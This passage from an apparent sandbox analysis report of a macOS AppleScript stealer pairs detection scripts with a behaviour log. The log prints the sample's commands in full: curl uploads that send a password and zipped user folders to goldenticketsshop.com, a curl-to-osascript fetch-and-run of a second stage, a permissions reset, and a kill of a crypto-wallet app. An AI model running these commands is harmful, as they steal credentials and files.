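        fh.write("123456\n")                             # what `echo '<pass>' >>` leaves
    open(os.path.join(tmp, "wid.txt"), "w").close()
    return triage_host(home, tmp, hw_uuid)


if __name__ == "__main__":
    for k, v in run_demo().items():
        print(f"{k}: {v}")
```

On a real host, read the Hardware UUID with `system_profiler SPHardwareDataType` and pass $HOME and /tmp to triage_host; a file matching ~/.<hwid>.txt is the sample's password drop, not a stray dotfile.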

    Source: /bin/bash (PID: 1680); Hash command executable: /sbin/md5 -> md5
    Source: /bin/bash (PID: 1687); Hash command executable: /sbin/md5 -> md5
    Source: unknown; TCP traffic detected without corresponding DNS query: 17.137.162.3 (21 events), 17.253.21.142 (6), 17.57.146.59 (6), 17.253.57.201 (3), 17.253.57.205 (3)
    Source: unknown; UDP traffic detected without corresponding DNS query: 17.253.150.10 (5), 4.2.2.1 (4), 17.253.145.10 (2)
    These destinations are background traffic of the analysis host, not the sample's: 17.0.0.0/8 is Apple's address space and 4.2.2.1 is a Level 3 public resolver. The sample's own hosts (goldenticketsshop.com and 67e5143a9ca7d2240c137ef80f2641d6.pages.dev) appear in the DNS queries below.
    Source: global traffic; HTTP traffic detected: GET /32f763b45cec3531f39b5365edf2c97e.aspx HTTP/1.1; host: 67e5143a9ca7d2240c137ef80f2641d6.pages.dev; user-agent: curl/8.7.1; accept: */*; accept-encoding: identity
    Source: global traffic; HTTP traffic detected: GET /app.asar.zip.part1.aspx HTTP/1.1; host: 67e5143a9ca7d2240c137ef80f2641d6.pages.dev; user-agent: curl/8.7.1; accept: */*; accept-encoding: identity
    Source: global traffic; HTTP traffic detected: GET /app.asar.zip.part2.aspx HTTP/1.1; host: 67e5143a9ca7d2240c137ef80f2641d6.pages.dev; user-agent: curl/8.7.1; accept: */*; accept-encoding: identity
    Source: global traffic; HTTP traffic detected: GET /app.asar.zip.part3.aspx HTTP/1.1; host: 67e5143a9ca7d2240c137ef80f2641d6.pages.dev; user-agent: curl/8.7.1; accept: */*; accept-encoding: identity
    Source: global traffic; DNS traffic detected: DNS query: h3.media.apple.map.fastly.net
    Source: global traffic; DNS traffic detected: DNS query: icloud.com
    Source: global traffic; DNS traffic detected: DNS query: goldenticketsshop.com
    Source: global traffic; DNS traffic detected: DNS query: 67e5143a9ca7d2240c137ef80f2641d6.pages.dev
    Source: payload_1_stealer.scpt; String found in binary or memory: https://67e5143a9ca7d2240c137ef80f2641d6.pages.dev/32f763b45cec3531f39b5365edf2c97e.aspx
    Source: payload_1_stealer.scpt; String found in binary or memory: https://goldenticketsshop.com
    Source: unknown; Network traffic detected: HTTP traffic on port 443, both directions, local ports 49159, 49160, 49161, 49162, 57888, 57889, 57998, 58016, 58017, 58020, 58021, 58022, 58025, 58026, 58027, 58028
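The four requests logged above are all the second stage needs, and they have a shape worth detecting on the network side: a pages.dev site whose leftmost label is a bare 32-hex hash, a 32-hex `.aspx` path on what is a static-hosting platform rather than an ASP.NET server, and a payload fetched as numbered `.partN.` segments that the host reassembles with `cat >>` and unzips. The script below is an added example, not part of the report; its request records are taken from the 'global traffic' lines above plus one constructed benign request, and it is written for proxy or DNS-plus-HTTP logs that expose host, path and User-Agent.

```python
"""Proxy-log heuristics for the staging traffic seen in this report.

Added example, not part of the report. Runs over (host, path, user-agent)
records and flags the patterns this sample uses. RECORDS holds the four
requests from the report plus a constructed benign one for contrast.
"""
import re
from collections import defaultdict

HEX32_LABEL = re.compile(r"^[0-9a-f]{32}\.")            # hash-named throw-away site
HEX32_ASPX = re.compile(r"^/[0-9a-f]{32}\.aspx$")       # hash-named script path
PART_PATH = re.compile(r"^(?P<base>.+)\.part(?P<n>\d+)\.[a-z0-9]+$")


def flag_request(host: str, path: str, user_agent: str) -> set:
    """Tags for one request. 'curl_ua' alone is weak; it is here so the
    combination with the other two can be scored."""
    tags = set()
    if HEX32_LABEL.match(host):
        tags.add("hex32_subdomain")
    # pages.dev is Cloudflare's static hosting; an .aspx path there is cosmetic.
    if host.endswith(".pages.dev") and HEX32_ASPX.match(path):
        tags.add("hex32_aspx_on_static_host")
    if user_agent.startswith("curl/"):
        tags.add("curl_ua")
    return tags


def find_segmented_downloads(records) -> dict:
    """{(host, base): [n, ...]} for every '<base>.partN.<ext>' fetched in
    two or more numbered parts from the same host."""
    parts = defaultdict(list)
    for host, path, _ in records:
        m = PART_PATH.match(path)
        if m:
            parts[(host, m.group("base"))].append(int(m.group("n")))
    return {k: sorted(v) for k, v in parts.items() if len(v) >= 2}


def triage_requests(records):
    """Return ({(host, path): tags} for flagged requests, segmented downloads)."""
    flagged = {}
    for host, path, ua in records:
        tags = flag_request(host, path, ua)
        if tags:
            flagged[(host, path)] = tags
    return flagged, find_segmented_downloads(records)


# (host, path, user-agent) as logged in this report; the last record is a
# constructed benign request and must not be flagged.
RECORDS = [
    ("67e5143a9ca7d2240c137ef80f2641d6.pages.dev", "/32f763b45cec3531f39b5365edf2c97e.aspx", "curl/8.7.1"),
    ("67e5143a9ca7d2240c137ef80f2641d6.pages.dev", "/app.asar.zip.part1.aspx", "curl/8.7.1"),
    ("67e5143a9ca7d2240c137ef80f2641d6.pages.dev", "/app.asar.zip.part2.aspx", "curl/8.7.1"),
    ("67e5143a9ca7d2240c137ef80f2641d6.pages.dev", "/app.asar.zip.part3.aspx", "curl/8.7.1"),
    ("www.apple.com", "/index.html", "Mozilla/5.0 (Macintosh)"),
]

if __name__ == "__main__":
    flagged, segments = triage_requests(RECORDS)
    for key, tags in flagged.items():
        print(key, sorted(tags))
    print("segmented downloads:", segments)
```

The segmented-download grouping is the part that survives a change of host or hash: a curl client pulling part1..partN of one base name with `-C -` resume is exactly what `--retry 10 --retry-max-time 3600` in the tree is tuned for, and ordinary software updaters do not fetch archives that way.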

    Key, Mouse, Clipboard, Microphone and Screen Capturing

    Source: /bin/bash (PID: 1820); Mutes volume: osascript -e set volume with output muted
    Source: classification engine; Classification label: mal88.troj.spyw.evad.macSCPT@0/28@5/0

    Persistence and Installation Behavior

    Source: /bin/bash (PID: 1840); Killall command executed: killall Ledger Live
    Source: /bin/bash (PID: 1745); Curl file upload using -F: /usr/bin/curl -> curl --retry 10 --retry-delay 10 --max-time 3600 -F file=@/tmp/a5b9845c461d901dad1363386bac5a75.zip -F hwid=53210679051327234f0b2e6abf37d5d7 -F wid=unknown -F user=jess https://goldenticketsshop.com/api/grabber
    Source: /bin/bash (PID: 1703); Hidden File created: /Users/jess/.53210679051327234f0b2e6abf37d5d7.txt
    Source: /bin/bash (PID: 1676); Osascript command executed: osascript payload_1_stealer.scpt
    Source: /bin/bash (PID: 1818); Osascript command executed: osascript
    Source: /bin/bash (PID: 1820); Osascript command executed: osascript -e set volume with output muted
    Source: /usr/bin/osascript, /bin/sh (PID: 1677); Shell command executed: sh -c system_profiler SPHardwareDataType | awk -F': ' '/Hardware UUID/ {print $2}' | md5
    Source: /usr/bin/osascript, /bin/sh (PID: 1683); Shell command executed: sh -c uuidgen
    Source: /usr/bin/osascript, /bin/sh (PID: 1684); Shell command executed: sh -c echo 'F6755809-1549-4438-86BA-7B8DDC85498B' | tr -d '\n' | md5
    Source: /usr/bin/osascript, /bin/sh (PID: 1688); Shell command executed: sh -c tail -n 1 /tmp/wid.txt
    Source: /usr/bin/osascript, /bin/sh (PID: 1699); Shell command executed: sh -c /usr/bin/dscl /Local/Default -authonly jess '123456'
    Source: /usr/bin/osascript, /bin/sh (PID: 1700); Shell command executed: sh -c nohup curl --retry 10 --retry-delay 10 --max-time 10 -d 'hwid=53210679051327234f0b2e6abf37d5d7&wid=unknown&user=jess&pass=123456' https://goldenticketsshop.com/api/credentials >/dev/null 2>&1 &
    Source: /usr/bin/osascript, /bin/sh (PID: 1702); Shell command executed: sh -c echo $HOME
    Source: /usr/bin/osascript, /bin/sh (PID: 1703); Shell command executed: sh -c echo '123456' >> '/Users/jess/.53210679051327234f0b2e6abf37d5d7.txt'
    Source: /usr/bin/osascript, /bin/sh (PID: 1705); Shell command executed: sh -c tccutil reset All
    Source: /usr/bin/osascript, /bin/sh (PID: 1736); Shell command executed: sh -c mkdir -p /tmp/a5b9845c461d901dad1363386bac5a75/Desktop
    Source: /usr/bin/osascript, /bin/sh (PID: 1740); Shell command executed: sh -c mkdir -p /tmp/a5b9845c461d901dad1363386bac5a75/Documents
    Source: /usr/bin/osascript, /bin/sh (PID: 1741); Shell command executed: sh -c mkdir -p /tmp/a5b9845c461d901dad1363386bac5a75/Downloads
    Source: /usr/bin/osascript, /bin/sh (PID: 1742); Shell command executed: sh -c mkdir -p /tmp/a5b9845c461d901dad1363386bac5a75/Notes
    Source: /usr/bin/osascript (PID: 1743)Shell command executed: sh -c cd /tmp && zip -r '/tmp/a5b9845c461d901dad1363386bac5a75.zip' a5b9845c461d901dad1363386bac5a75Jump to behavior
    Source: /bin/sh (PID: 1743)Shell command executed: sh -c cd /tmp && zip -r '/tmp/a5b9845c461d901dad1363386bac5a75.zip' a5b9845c461d901dad1363386bac5a75Jump to behavior
    Source: /usr/bin/osascript (PID: 1745)Shell command executed: sh -c curl --retry 10 --retry-delay 10 --max-time 3600 -F 'file=@/tmp/a5b9845c461d901dad1363386bac5a75.zip' -F 'hwid=53210679051327234f0b2e6abf37d5d7' -F 'wid=unknown' -F 'user=jess' https://goldenticketsshop.com/api/grabberJump to behavior
    Source: /bin/sh (PID: 1745)Shell command executed: sh -c curl --retry 10 --retry-delay 10 --max-time 3600 -F 'file=@/tmp/a5b9845c461d901dad1363386bac5a75.zip' -F 'hwid=53210679051327234f0b2e6abf37d5d7' -F 'wid=unknown' -F 'user=jess' https://goldenticketsshop.com/api/grabberJump to behavior
    Source: /usr/bin/osascript (PID: 1814)Shell command executed: sh -c rm -rf /tmp/a5b9845c461d901dad1363386bac5a75Jump to behavior
    Source: /bin/sh (PID: 1814)Shell command executed: sh -c rm -rf /tmp/a5b9845c461d901dad1363386bac5a75Jump to behavior
    Source: /usr/bin/osascript (PID: 1815)Shell command executed: sh -c rm -f '/tmp/a5b9845c461d901dad1363386bac5a75.zip'Jump to behavior
    Source: /bin/sh (PID: 1815)Shell command executed: sh -c rm -f '/tmp/a5b9845c461d901dad1363386bac5a75.zip'Jump to behavior
    Source: /usr/bin/osascript (PID: 1816)Shell command executed: sh -c nohup curl -fsSL 'https://67e5143a9ca7d2240c137ef80f2641d6.pages.dev/32f763b45cec3531f39b5365edf2c97e.aspx' | osascript >/dev/null 2>&1 &Jump to behavior
    Source: /bin/sh (PID: 1816)Shell command executed: sh -c nohup curl -fsSL 'https://67e5143a9ca7d2240c137ef80f2641d6.pages.dev/32f763b45cec3531f39b5365edf2c97e.aspx' | osascript >/dev/null 2>&1 &Jump to behavior
    Source: /usr/bin/osascript (PID: 1820)Shell command executed: sh -c osascript -e 'set volume with output muted'Jump to behavior
    Source: /bin/sh (PID: 1820)Shell command executed: sh -c osascript -e 'set volume with output muted'Jump to behavior
    Source: /usr/bin/osascript (PID: 1821)Shell command executed: sh -c mkdir -p '/tmp/downloaded_parts'Jump to behavior
    Source: /bin/sh (PID: 1821)Shell command executed: sh -c mkdir -p '/tmp/downloaded_parts'Jump to behavior
    Source: /usr/bin/osascript (PID: 1823)Shell command executed: sh -c rm -f '/tmp/app.asar.zip'Jump to behavior
    Source: /bin/sh (PID: 1823)Shell command executed: sh -c rm -f '/tmp/app.asar.zip'Jump to behavior
    Source: /usr/bin/osascript (PID: 1824)Shell command executed: sh -c curl --max-time 3600 --retry 10 --retry-delay 5 --retry-max-time 3600 -f -C - -o '/tmp/downloaded_parts/part1.aspx' 'https://67e5143a9ca7d2240c137ef80f2641d6.pages.dev/app.asar.zip.part1.aspx'Jump to behavior
    Source: /bin/sh (PID: 1824)Shell command executed: sh -c curl --max-time 3600 --retry 10 --retry-delay 5 --retry-max-time 3600 -f -C - -o '/tmp/downloaded_parts/part1.aspx' 'https://67e5143a9ca7d2240c137ef80f2641d6.pages.dev/app.asar.zip.part1.aspx'Jump to behavior
    Source: /usr/bin/osascript (PID: 1825)Shell command executed: sh -c cat '/tmp/downloaded_parts/part1.aspx' >> '/tmp/app.asar.zip'Jump to behavior
    Source: /bin/sh (PID: 1825)Shell command executed: sh -c cat '/tmp/downloaded_parts/part1.aspx' >> '/tmp/app.asar.zip'Jump to behavior
    Source: /usr/bin/osascript (PID: 1827)Shell command executed: sh -c curl --max-time 3600 --retry 10 --retry-delay 5 --retry-max-time 3600 -f -C - -o '/tmp/downloaded_parts/part2.aspx' 'https://67e5143a9ca7d2240c137ef80f2641d6.pages.dev/app.asar.zip.part2.aspx'Jump to behavior
    Source: /bin/sh (PID: 1827)Shell command executed: sh -c curl --max-time 3600 --retry 10 --retry-delay 5 --retry-max-time 3600 -f -C - -o '/tmp/downloaded_parts/part2.aspx' 'https://67e5143a9ca7d2240c137ef80f2641d6.pages.dev/app.asar.zip.part2.aspx'Jump to behavior
    Source: /usr/bin/osascript (PID: 1831)Shell command executed: sh -c cat '/tmp/downloaded_parts/part2.aspx' >> '/tmp/app.asar.zip'Jump to behavior
    Source: /bin/sh (PID: 1831)Shell command executed: sh -c cat '/tmp/downloaded_parts/part2.aspx' >> '/tmp/app.asar.zip'Jump to behavior
    Source: /usr/bin/osascript (PID: 1833)Shell command executed: sh -c curl --max-time 3600 --retry 10 --retry-delay 5 --retry-max-time 3600 -f -C - -o '/tmp/downloaded_parts/part3.aspx' 'https://67e5143a9ca7d2240c137ef80f2641d6.pages.dev/app.asar.zip.part3.aspx'Jump to behavior
    Source: /bin/sh (PID: 1833)Shell command executed: sh -c curl --max-time 3600 --retry 10 --retry-delay 5 --retry-max-time 3600 -f -C - -o '/tmp/downloaded_parts/part3.aspx' 'https://67e5143a9ca7d2240c137ef80f2641d6.pages.dev/app.asar.zip.part3.aspx'Jump to behavior
    Source: /usr/bin/osascript (PID: 1835)Shell command executed: sh -c cat '/tmp/downloaded_parts/part3.aspx' >> '/tmp/app.asar.zip'Jump to behavior
    Source: /bin/sh (PID: 1835)Shell command executed: sh -c cat '/tmp/downloaded_parts/part3.aspx' >> '/tmp/app.asar.zip'Jump to behavior
    Source: /usr/bin/osascript (PID: 1837)Shell command executed: sh -c cd /tmp && unzip -o '/tmp/app.asar.zip'Jump to behavior
    Source: /bin/sh (PID: 1837)Shell command executed: sh -c cd /tmp && unzip -o '/tmp/app.asar.zip'Jump to behavior
    Source: /usr/bin/osascript (PID: 1839)Shell command executed: sh -c killall 'Ledger Live' || trueJump to behavior
    Source: /bin/sh (PID: 1839)Shell command executed: sh -c killall 'Ledger Live' || trueJump to behavior
    Source: /usr/bin/nohup (PID: 1701)Curl executable: /usr/bin/curl -> curl --retry 10 --retry-delay 10 --max-time 10 -d hwid=53210679051327234f0b2e6abf37d5d7&wid=unknown&user=jess&pass=123456 https://goldenticketsshop.com/api/credentialsJump to behavior
    Source: /bin/bash (PID: 1745)Curl executable: /usr/bin/curl -> curl --retry 10 --retry-delay 10 --max-time 3600 -F file=@/tmp/a5b9845c461d901dad1363386bac5a75.zip -F hwid=53210679051327234f0b2e6abf37d5d7 -F wid=unknown -F user=jess https://goldenticketsshop.com/api/grabberJump to behavior
    Source: /usr/bin/nohup (PID: 1817)Curl executable: /usr/bin/curl -> curl -fsSL https://67e5143a9ca7d2240c137ef80f2641d6.pages.dev/32f763b45cec3531f39b5365edf2c97e.aspxJump to behavior
    Source: /bin/bash (PID: 1824)Curl executable: /usr/bin/curl -> curl --max-time 3600 --retry 10 --retry-delay 5 --retry-max-time 3600 -f -C - -o /tmp/downloaded_parts/part1.aspx https://67e5143a9ca7d2240c137ef80f2641d6.pages.dev/app.asar.zip.part1.aspxJump to behavior
    Source: /bin/bash (PID: 1827)Curl executable: /usr/bin/curl -> curl --max-time 3600 --retry 10 --retry-delay 5 --retry-max-time 3600 -f -C - -o /tmp/downloaded_parts/part2.aspx https://67e5143a9ca7d2240c137ef80f2641d6.pages.dev/app.asar.zip.part2.aspxJump to behavior
    Source: /bin/bash (PID: 1833)Curl executable: /usr/bin/curl -> curl --max-time 3600 --retry 10 --retry-delay 5 --retry-max-time 3600 -f -C - -o /tmp/downloaded_parts/part3.aspx https://67e5143a9ca7d2240c137ef80f2641d6.pages.dev/app.asar.zip.part3.aspxJump to behavior
    Source: /bin/bash (PID: 1736)Mkdir executable: /bin/mkdir -> mkdir -p /tmp/a5b9845c461d901dad1363386bac5a75/DesktopJump to behavior
    Source: /bin/bash (PID: 1740)Mkdir executable: /bin/mkdir -> mkdir -p /tmp/a5b9845c461d901dad1363386bac5a75/DocumentsJump to behavior
    Source: /bin/bash (PID: 1741)Mkdir executable: /bin/mkdir -> mkdir -p /tmp/a5b9845c461d901dad1363386bac5a75/DownloadsJump to behavior
    Source: /bin/bash (PID: 1742)Mkdir executable: /bin/mkdir -> mkdir -p /tmp/a5b9845c461d901dad1363386bac5a75/NotesJump to behavior
    Source: /bin/bash (PID: 1821)Mkdir executable: /bin/mkdir -> mkdir -p /tmp/downloaded_partsJump to behavior
    Source: /bin/bash (PID: 1701)Nohup executable: /usr/bin/nohup -> nohup curl --retry 10 --retry-delay 10 --max-time 10 -d hwid=53210679051327234f0b2e6abf37d5d7&wid=unknown&user=jess&pass=123456 https://goldenticketsshop.com/api/credentialsJump to behavior
    Source: /bin/bash (PID: 1817)Nohup executable: /usr/bin/nohup -> nohup curl -fsSL https://67e5143a9ca7d2240c137ef80f2641d6.pages.dev/32f763b45cec3531f39b5365edf2c97e.aspxJump to behavior
    Source: /bin/bash (PID: 1814)Rm executable: /bin/rm -> rm -rf /tmp/a5b9845c461d901dad1363386bac5a75Jump to behavior
    Source: /bin/bash (PID: 1815)Rm executable: /bin/rm -> rm -f /tmp/a5b9845c461d901dad1363386bac5a75.zipJump to behavior
    Source: /bin/bash (PID: 1823)Rm executable: /bin/rm -> rm -f /tmp/app.asar.zipJump to behavior
    Source: /bin/bash (PID: 1683)Uuidgen executable: /usr/bin/uuidgen -> uuidgenJump to behavior
    Source: /bin/sh (PID: 1677)Shell process: sh -c system_profiler SPHardwareDataType | awk -F': ' '/Hardware UUID/ {print $2}' | md5Jump to behavior
    Source: /bin/sh (PID: 1683)Shell process: sh -c uuidgenJump to behavior
    Source: /bin/sh (PID: 1684)Shell process: sh -c echo 'F6755809-1549-4438-86BA-7B8DDC85498B' | tr -d '\n' | md5Jump to behavior
    Source: /bin/sh (PID: 1688)Shell process: sh -c tail -n 1 /tmp/wid.txtJump to behavior
    Source: /bin/sh (PID: 1699)Shell process: sh -c /usr/bin/dscl /Local/Default -authonly jess '123456'Jump to behavior
    Source: /bin/sh (PID: 1700)Shell process: sh -c nohup curl --retry 10 --retry-delay 10 --max-time 10 -d 'hwid=53210679051327234f0b2e6abf37d5d7&wid=unknown&user=jess&pass=123456' https://goldenticketsshop.com/api/credentials >/dev/null 2>&1 &Jump to behavior
    Source: /bin/sh (PID: 1702)Shell process: sh -c echo $HOMEJump to behavior
    Source: /bin/sh (PID: 1703)Shell process: sh -c echo '123456' >> '/Users/jess/.53210679051327234f0b2e6abf37d5d7.txt'Jump to behavior
    Source: /bin/sh (PID: 1705)Shell process: sh -c tccutil reset AllJump to behavior
    Source: /bin/sh (PID: 1736)Shell process: sh -c mkdir -p /tmp/a5b9845c461d901dad1363386bac5a75/DesktopJump to behavior
    Source: /bin/sh (PID: 1740)Shell process: sh -c mkdir -p /tmp/a5b9845c461d901dad1363386bac5a75/DocumentsJump to behavior
    Source: /bin/sh (PID: 1741)Shell process: sh -c mkdir -p /tmp/a5b9845c461d901dad1363386bac5a75/DownloadsJump to behavior
    Source: /bin/sh (PID: 1742)Shell process: sh -c mkdir -p /tmp/a5b9845c461d901dad1363386bac5a75/NotesJump to behavior
    Source: /bin/sh (PID: 1743)Shell process: sh -c cd /tmp && zip -r '/tmp/a5b9845c461d901dad1363386bac5a75.zip' a5b9845c461d901dad1363386bac5a75Jump to behavior
    Source: /bin/sh (PID: 1745)Shell process: sh -c curl --retry 10 --retry-delay 10 --max-time 3600 -F 'file=@/tmp/a5b9845c461d901dad1363386bac5a75.zip' -F 'hwid=53210679051327234f0b2e6abf37d5d7' -F 'wid=unknown' -F 'user=jess' https://goldenticketsshop.com/api/grabberJump to behavior
    Source: /bin/sh (PID: 1814)Shell process: sh -c rm -rf /tmp/a5b9845c461d901dad1363386bac5a75Jump to behavior
    Source: /bin/sh (PID: 1815)Shell process: sh -c rm -f '/tmp/a5b9845c461d901dad1363386bac5a75.zip'Jump to behavior
    Source: /bin/sh (PID: 1816)Shell process: sh -c nohup curl -fsSL 'https://67e5143a9ca7d2240c137ef80f2641d6.pages.dev/32f763b45cec3531f39b5365edf2c97e.aspx' | osascript >/dev/null 2>&1 &Jump to behavior
    Source: /bin/sh (PID: 1820)Shell process: sh -c osascript -e 'set volume with output muted'Jump to behavior
    Source: /bin/sh (PID: 1821)Shell process: sh -c mkdir -p '/tmp/downloaded_parts'Jump to behavior
    Source: /bin/sh (PID: 1823)Shell process: sh -c rm -f '/tmp/app.asar.zip'Jump to behavior
    Source: /bin/sh (PID: 1824)Shell process: sh -c curl --max-time 3600 --retry 10 --retry-delay 5 --retry-max-time 3600 -f -C - -o '/tmp/downloaded_parts/part1.aspx' 'https://67e5143a9ca7d2240c137ef80f2641d6.pages.dev/app.asar.zip.part1.aspx'Jump to behavior
    Source: /bin/sh (PID: 1825)Shell process: sh -c cat '/tmp/downloaded_parts/part1.aspx' >> '/tmp/app.asar.zip'Jump to behavior
    Source: /bin/sh (PID: 1827)Shell process: sh -c curl --max-time 3600 --retry 10 --retry-delay 5 --retry-max-time 3600 -f -C - -o '/tmp/downloaded_parts/part2.aspx' 'https://67e5143a9ca7d2240c137ef80f2641d6.pages.dev/app.asar.zip.part2.aspx'Jump to behavior
    Source: /bin/sh (PID: 1831)Shell process: sh -c cat '/tmp/downloaded_parts/part2.aspx' >> '/tmp/app.asar.zip'Jump to behavior
    Source: /bin/sh (PID: 1833)Shell process: sh -c curl --max-time 3600 --retry 10 --retry-delay 5 --retry-max-time 3600 -f -C - -o '/tmp/downloaded_parts/part3.aspx' 'https://67e5143a9ca7d2240c137ef80f2641d6.pages.dev/app.asar.zip.part3.aspx'Jump to behavior
    Source: /bin/sh (PID: 1835)Shell process: sh -c cat '/tmp/downloaded_parts/part3.aspx' >> '/tmp/app.asar.zip'Jump to behavior
    Source: /bin/sh (PID: 1837)Shell process: sh -c cd /tmp && unzip -o '/tmp/app.asar.zip'Jump to behavior
    Source: /bin/sh (PID: 1839)Shell process: sh -c killall 'Ledger Live' || trueJump to behavior
    Source: /usr/bin/osascript (PID: 1676)AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plistJump to behavior
    Source: /usr/bin/osascript (PID: 1818)AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plistJump to behavior
    Source: /usr/bin/osascript (PID: 1820)AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plistJump to behavior
    Source: /usr/bin/osascript (PID: 1676)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plistJump to behavior
    Source: /usr/bin/osascript (PID: 1676)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plistJump to behavior
    Source: /usr/bin/osascript (PID: 1818)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plistJump to behavior
    Source: /usr/bin/osascript (PID: 1818)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plistJump to behavior
    Source: /usr/bin/osascript (PID: 1820)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plistJump to behavior
    Source: /usr/bin/osascript (PID: 1820)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plistJump to behavior
    Source: /usr/bin/zip (PID: 1744)ZIP file created: /private/tmp/a5b9845c461d901dad1363386bac5a75.zipJump to dropped file
    Source: /usr/bin/zip (PID: 1744)ZIP file created: /private/tmp/zixiNUg5Jump to dropped file
    Source: /usr/bin/curl (PID: 1824)ZIP file created: /private/tmp/downloaded_parts/part1.aspxJump to dropped file
    Source: /bin/bash (PID: 1826)ZIP file created: /private/tmp/app.asar.zipJump to dropped file
    Source: /bin/bash (PID: 1679)Awk executable: /usr/bin/awk -> awk -F: /Hardware UUID/ {print $2}Jump to behavior
    Source: /System/Volumes/Preboot/Cryptexes/App/usr/libexec/AuthenticationServicesAgent (PID: 1659)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plistJump to behavior
    Source: /usr/bin/osascript (PID: 1676)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plistJump to behavior
    Source: /usr/bin/osascript (PID: 1818)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plistJump to behavior
    Source: /usr/bin/osascript (PID: 1820)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plistJump to behavior
    Source: /System/Applications/Notes.app/Contents/MacOS/Notes (PID: 1724)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plistJump to behavior
    Source: /System/Applications/System Settings.app/Contents/MacOS/System Settings (PID: 1753)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plistJump to behavior
    Source: /System/Applications/Notes.app/Contents/MacOS/Notes (PID: 1724)XML plist file created: /Users/jess/Library/Containers/com.apple.Notes/Data/tmp/TemporaryItems/NSIRD_Notes_BXLAzO/NotesIndexerState-ModernJump to dropped file
    Source: /System/Applications/Notes.app/Contents/MacOS/Notes (PID: 1724)XML plist file created: /Users/jess/Library/Containers/com.apple.Notes/Data/tmp/TemporaryItems/NSIRD_Notes_dJVnzk/NotesIndexerState-HTMLJump to dropped file
    Source: /System/Applications/Notes.app/Contents/MacOS/Notes (PID: 1724)XML plist file created: /Users/jess/Library/Containers/com.apple.Notes/Data/tmp/TemporaryItems/NSIRD_Notes_031lUb/NotesIndexerState-ModernJump to dropped file
    Source: /System/Applications/Notes.app/Contents/MacOS/Notes (PID: 1724)XML plist file created: /Users/jess/Library/Containers/com.apple.Notes/Data/tmp/TemporaryItems/NSIRD_Notes_JcqD2u/NotesIndexerState-HTMLJump to dropped file
    Source: /System/Applications/Notes.app/Contents/MacOS/Notes (PID: 1724)XML plist file created: /Users/jess/Library/Containers/com.apple.Notes/Data/tmp/TemporaryItems/NSIRD_Notes_Ht0qUQ/NotesIndexerState-HTMLJump to dropped file
    Source: /System/Applications/Notes.app/Contents/MacOS/Notes (PID: 1724)XML plist file created: /Users/jess/Library/Containers/com.apple.Notes/Data/tmp/TemporaryItems/NSIRD_Notes_JSAeuO/NotesIndexerState-HTMLJump to dropped file
    Source: /System/Applications/Notes.app/Contents/MacOS/Notes (PID: 1724)XML plist file created: /Users/jess/Library/Containers/com.apple.Notes/Data/tmp/TemporaryItems/NSIRD_Notes_GGD2MG/NotesIndexerState-HTMLJump to dropped file
    Source: /System/Applications/Notes.app/Contents/MacOS/Notes (PID: 1724)XML plist file created: /Users/jess/Library/Containers/com.apple.Notes/Data/tmp/TemporaryItems/NSIRD_Notes_8Nhm0A/NotesIndexerState-ModernJump to dropped file
    Source: /System/Applications/Notes.app/Contents/MacOS/Notes (PID: 1724)XML plist file created: /Users/jess/Library/Containers/com.apple.Notes/Data/tmp/TemporaryItems/NSIRD_Notes_HUu32a/NotesIndexerState-ModernJump to dropped file
    Source: /System/Applications/Notes.app/Contents/MacOS/Notes (PID: 1724)XML plist file created: /Users/jess/Library/Containers/com.apple.Notes/Data/tmp/TemporaryItems/NSIRD_Notes_oiZkwB/NotesIndexerState-ModernJump to dropped file
    Source: /System/Applications/Notes.app/Contents/MacOS/Notes (PID: 1724)XML plist file created: /Users/jess/Library/Containers/com.apple.Notes/Data/tmp/TemporaryItems/NSIRD_Notes_3nR46B/NotesIndexerState-ModernJump to dropped file

    Lowering of HIPS / PFW / Operating System Security Settings

    Source: /bin/bash (PID: 1705) Tccutil reset: /usr/bin/tccutil tccutil reset All
    Source: /bin/bash (PID: 1705) Tccutil executable: /usr/bin/tccutil tccutil reset All

    Stealing of Sensitive Information

    Source: /usr/bin/nohup (PID: 1701) Curl exfiltrating password: /usr/bin/curl -> curl --retry 10 --retry-delay 10 --max-time 10 -d hwid=53210679051327234f0b2e6abf37d5d7&wid=unknown&user=jess&pass=123456 https://goldenticketsshop.com/api/credentials
    Source: /bin/bash (PID: 1840) Kills crypto wallet processes: killall Ledger Live
    Source: Yara match, File source: payload_1_stealer.scpt, type: SAMPLE
    Source: /bin/bash (PID: 1699) Security executable: /usr/bin/dscl /usr/bin/dscl /Local/Default -authonly jess 123456
    Source: /bin/bash (PID: 1703) Default password detected: /Users/jess/.53210679051327234f0b2e6abf37d5d7.txt
    Source: /bin/bash (PID: 1678) System_profiler executable: /usr/sbin/system_profiler system_profiler SPHardwareDataType
    Source: /usr/sbin/system_profiler (PID: 1681) System_profiler executable: /usr/sbin/system_profiler /usr/sbin/system_profiler -nospawn -xml SPHardwareDataType -detailLevel full

    Remote Access Functionality

    Source: Yara match, File source: payload_1_stealer.scpt, type: SAMPLE

    MITRE ATT&CK Matrix (techniques per tactic; the number in parentheses is the count of matching signatures where the report gives one)

    Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names
    Resource Development: Scripting (1); Domains; DNS Server; Virtual Private Server
